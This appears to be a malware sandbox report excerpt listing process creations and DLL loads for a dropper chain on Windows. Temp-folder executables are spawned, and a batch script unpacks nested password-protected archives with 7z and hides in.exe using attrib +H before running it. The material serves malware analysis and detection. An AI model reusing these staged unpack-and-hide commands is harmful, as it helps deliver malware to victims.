Source: C:\Program Files\Windows Media Player\graph\graph.exe	Process created: unknown unknown
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Process created: unknown unknown
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Process created: unknown unknown
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Process created: unknown unknown
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Process created: unknown unknown
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Process created: unknown unknown
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Process created: unknown unknown
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Process created: unknown unknown
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Process created: unknown unknown
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1019807001\fed209a298.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mode.com mode 65,10
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e file.zip -p24291711423417250691697322505 -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_7.zip -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_6.zip -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_5.zip -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_4.zip -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_3.zip -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_2.zip -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_1.zip -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +H "in.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\in.exe "in.exe"
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=2020,i,9689288529753768681,16251776256977340336,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2092 --field-trial-handle=1896,i,12670110117547472489,9919710974034133825,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 --field-trial-handle=2004,i,2036866093412023983,10134248747286953754,262144 /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1019811001\2e4e1b8516.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1019811001\2e4e1b8516.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_1.zip -oextracted
Source: C:\Users\user\AppData\Local\Temp\1019811001\2e4e1b8516.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1019811001\2e4e1b8516.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1019811001\2e4e1b8516.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1019811001\2e4e1b8516.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1019811001\2e4e1b8516.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1019811001\2e4e1b8516.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1019811001\2e4e1b8516.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1019811001\2e4e1b8516.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1019811001\2e4e1b8516.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1019811001\2e4e1b8516.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2484 --field-trial-handle=2328,i,6628927633879078987,5168946575575726865,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=2020,i,9689288529753768681,16251776256977340336,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exe	Section loaded: mstask.dll
Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exe	Section loaded: windows.storage.dll
